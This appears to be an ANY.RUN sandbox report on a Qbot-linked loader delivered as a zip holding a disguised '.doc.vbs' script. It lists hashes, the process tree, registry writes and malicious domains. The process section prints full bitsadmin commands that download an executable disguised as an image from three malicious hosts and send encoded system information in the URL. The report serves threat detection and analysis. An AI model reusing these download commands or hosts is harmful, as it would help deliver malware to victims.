analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

Operating Agreement 03192019b02.zip

Full analysis: https://app.any.run/tasks/aa1e571f-780d-4997-84a3-c466e0ed4041
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: March 21, 2019, 12:59:41
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
loader
trojan
Indicators:
MIME: application/zip
File info: Zip archive data, at least v2.0 to extract
MD5:

69F8E82F02DABF1E9641A37C1230C89B

SHA1:

C03E8839E21EED9E4E80DDF092388A880323A63D

SHA256:

96F9103C5A4785D545C73B52AE0C33D8CB0D904B61CC67FE7D08E1BCBCC2B3CA

SSDEEP:

48:9umWFGsqeo1TfLJ8RUUDyD3lCmC0wvuJZqwHyEXx58lU8vmmloy/mI:oVG3ltjoU/YTvuqwnSlUamkr

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Uses BITADMIN.EXE for downloading application

      • WScript.exe (PID: 4072)
  • SUSPICIOUS

    • Executes scripts

      • WinRAR.exe (PID: 720)
  • INFO

    No info indicators.
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.zip | ZIP compressed archive (100)

EXIF

ZIP

ZipRequiredVersion: 20
ZipBitFlag: -
ZipCompression: Deflated
ZipModifyDate: 2019:03:20 19:33:19
ZipCRC: 0x6d10dee2
ZipCompressedSize: 2521
ZipUncompressedSize: 6462
ZipFileName: Operating Agreement 03192019b02.doc.vbs
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
39
Monitored processes
6
Malicious processes
0
Suspicious processes
2

Behavior graph

Click at the process to see the details
start winrar.exe no specs wscript.exe no specs wmic.exe no specs bitsadmin.exe no specs bitsadmin.exe no specs bitsadmin.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
720"C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\Operating Agreement 03192019b02.zip"C:\Program Files\WinRAR\WinRAR.exeexplorer.exe
User:
admin
Company:
Alexander Roshal
Integrity Level:
MEDIUM
Description:
WinRAR archiver
Version:
5.60.0
4072"C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\Rar$DIa720.21253\Operating Agreement 03192019b02.doc.vbs" C:\Windows\System32\WScript.exeWinRAR.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.8.7600.16385
2204wmic OS get Caption /valueC:\Windows\System32\Wbem\wmic.exeWScript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
WMI Commandline Utility
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2464"C:\Windows\System32\bitsadmin.exe" /transfer qcxjb15 /Priority HIGH http://apps.theandroidstore.tv/august.png?bg=sp34&os=TWljcm9zb2Z0IFdpbmRvd3MgNyBQcm9mZXNzaW9uYWwgDQ0KDQ0KDQ0KDQ0K&av= C:\Users\admin\AppData\Local\Temp\13046812.2.exeC:\Windows\System32\bitsadmin.exeWScript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
BITS administration utility
Exit code:
2149580817
Version:
7.5.7600.16385 (win7_rtm.090713-1255)
2124"C:\Windows\System32\bitsadmin.exe" /transfer qcxjb46 /Priority HIGH http://img.syrusdesign.com/light.png?bg=sp34&os=TWljcm9zb2Z0IFdpbmRvd3MgNyBQcm9mZXNzaW9uYWwgDQ0KDQ0KDQ0KDQ0K&av= C:\Users\admin\AppData\Local\Temp\13046812.2.exeC:\Windows\System32\bitsadmin.exeWScript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
BITS administration utility
Exit code:
2149580817
Version:
7.5.7600.16385 (win7_rtm.090713-1255)
2764"C:\Windows\System32\bitsadmin.exe" /transfer qcxjb47 /Priority HIGH http://assets.donjuanbands.com/guitarqq.png?bg=sp34&os=TWljcm9zb2Z0IFdpbmRvd3MgNyBQcm9mZXNzaW9uYWwgDQ0KDQ0KDQ0KDQ0K&av= C:\Users\admin\AppData\Local\Temp\13046812.2.exeC:\Windows\System32\bitsadmin.exeWScript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
BITS administration utility
Exit code:
2149580817
Version:
7.5.7600.16385 (win7_rtm.090713-1255)
Total events
551
Read events
533
Write events
18
Delete events
0

Modification events

(PID) Process:(720) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes
Operation:writeName:ShellExtBMP
Value:
(PID) Process:(720) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes
Operation:writeName:ShellExtIcon
Value:
(PID) Process:(720) WinRAR.exeKey:HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
Operation:writeName:LanguageList
Value:
en-US
(PID) Process:(720) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\ArcHistory
Operation:writeName:0
Value:
C:\Users\admin\AppData\Local\Temp\Operating Agreement 03192019b02.zip
(PID) Process:(720) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation:writeName:name
Value:
120
(PID) Process:(720) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation:writeName:size
Value:
80
(PID) Process:(720) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation:writeName:type
Value:
120
(PID) Process:(720) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation:writeName:mtime
Value:
100
(PID) Process:(720) WinRAR.exeKey:HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
Operation:writeName:@C:\Windows\System32\wshext.dll,-4802
Value:
VBScript Script File
(PID) Process:(720) WinRAR.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
0
Executable files
0
Suspicious files
0
Text files
1
Unknown types
0

Dropped files

PID
Process
Filename
Type
720WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$DIa720.21253\Operating Agreement 03192019b02.doc.vbstext
MD5:DDAF4A963B391FA79EA09AC91D23701F
SHA256:F7987F4A862E0642839AF7A785DAF4BDEE37D9F6383E612F588E82ACA743F4F7
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
3
TCP/UDP connections
3
DNS requests
3
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
HEAD
200
216.120.232.36:80
http://img.syrusdesign.com/light.png?bg=sp34&os=TWljcm9zb2Z0IFdpbmRvd3MgNyBQcm9mZXNzaW9uYWwgDQ0KDQ0KDQ0KDQ0K&av=
US
malicious
HEAD
200
192.185.41.190:80
http://apps.theandroidstore.tv/august.png?bg=sp34&os=TWljcm9zb2Z0IFdpbmRvd3MgNyBQcm9mZXNzaW9uYWwgDQ0KDQ0KDQ0KDQ0K&av=
US
malicious
HEAD
200
216.120.231.252:80
http://assets.donjuanbands.com/guitarqq.png?bg=sp34&os=TWljcm9zb2Z0IFdpbmRvd3MgNyBQcm9mZXNzaW9uYWwgDQ0KDQ0KDQ0KDQ0K&av=
US
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
216.120.231.252:80
assets.donjuanbands.com
HostRocket.com, Inc.
US
malicious
192.185.41.190:80
apps.theandroidstore.tv
CyrusOne LLC
US
suspicious
216.120.232.36:80
img.syrusdesign.com
HostRocket.com, Inc.
US
malicious

DNS requests

Domain
IP
Reputation
apps.theandroidstore.tv
  • 192.185.41.190
malicious
img.syrusdesign.com
  • 216.120.232.36
malicious
assets.donjuanbands.com
  • 216.120.231.252
malicious

Threats

PID
Process
Class
Message
A Network Trojan was detected
MALWARE [PTsecurity] Backdoor.Qbot!8.3147/N3
A Network Trojan was detected
MALWARE [PTsecurity] Backdoor.Qbot!8.3147/N3
A Network Trojan was detected
MALWARE [PTsecurity] Backdoor.Qbot!8.3147/N3
3 ETPRO signatures available at the full report
No debug info